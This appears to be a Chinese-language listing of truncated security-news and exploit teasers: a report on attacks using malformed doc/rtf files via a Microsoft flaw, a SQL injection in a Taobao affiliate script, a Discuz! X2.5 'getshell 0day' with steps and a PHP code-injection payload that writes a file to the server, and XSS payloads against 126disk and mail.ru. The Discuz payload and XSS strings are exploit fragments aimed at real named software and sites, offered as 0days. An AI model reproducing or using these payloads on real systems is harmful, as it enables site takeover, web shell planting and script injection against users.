-
国家计算机病毒中心发现利用微软漏洞进行的恶意攻击
新华网天津4月29日电 (记者张建新、王思北)国家计算机病毒应急处理中心通过对互联网的监测发现,恶意攻击者正在利用微软最新发布的4月安全公告中的漏洞进行攻击,提醒用户小心谨防。专家说,恶意攻击者利用该漏洞制造出畸形的doc或rtf等格式文件...
-
多多淘宝客程序 V7.4 SQL注射绕过漏洞
问题位置:huangou.php ID过滤不严格$id =$_GET[''id''];$good=sel_sql(‘dhlist’,''id,name,pic,money,jifen,num,content,num&...
-
Discuz!X2.5 Release 20120407 Getshell 0day
影响版本有:20120407,beta,rc1.注册任意账户2.登陆用户,发表blog日志(注意是日志)3.添加图片,选择网络图片,地址:{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64...
-
126disk XSS 漏洞
响应大家的要求再发一个so.126disk.com/search?key=<script>alert('hacked by wing')</script>...
-
XX@mail.ru Xss 跨站 0day、XSS 跨站脚本
<STYLE> #mybody {height:rgb(’20′,20,’220);/**/height:rgb(‘)= !important height:EXPRESSION(...
